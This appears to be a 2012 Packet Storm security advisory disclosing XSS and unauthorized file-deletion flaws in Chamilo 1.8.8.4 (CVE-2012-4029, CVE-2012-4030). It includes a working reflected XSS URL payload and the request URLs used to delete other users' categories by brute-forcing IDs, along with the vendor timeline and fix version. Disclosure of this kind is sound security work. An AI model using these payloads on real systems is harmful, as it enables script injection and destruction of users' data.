Chamilo 1.8.8.4 XSS / File Deletion

2012-08-27T00:00:00
ID PACKETSTORM:115927
Type packetstorm
Reporter beford
Modified 2012-08-27T00:00:00

Description

                                        
                                            `Chamilo 1.8.8.4 Multiple Vulnerabilities  
========================  
  
CVE: CVE-2012-4029  
Issue: Reflected XSS PHP_SELF in third-party app, Stored XSS  
  
* PHP_SELF XSS  
http://chamilo-1.8.8.4/main/inc/lib/phpdocx/pdf/www/examples.php/'"><img  
src=404 onerror=alert(1) >  
  
* Stored XSS unfiltered input category_name  
  
http://chamilo/chamilo-1.8.8.4/main/dropbox/index.php?cidReq=LEETLANG&view=&action=addsentcategory  
  
  
CVE: CVE-2012-4030  
Issue: Unauthorized file delete  
  
* Unauthorized file delete  
  
You have to be subscribed to the course and you can delete other users  
categories by bruteforcing the category ID.  
  
http://chamilo/chamilo-1.8.8.4/main/dropbox/index.php?cidReq=COURSEID&view_received_category=&view_sent_category=&view=&action=deletesentcategory&id=CATEGORYID  
  
Vendor:  
www.chamilo.org  
  
Vendor informed:  
Jul 16/2012  
  
Vendor acknowledgement:  
Jul 16/2012  
  
Fix Released  
Version 1.8.8.6 - Jul 20/2012  
`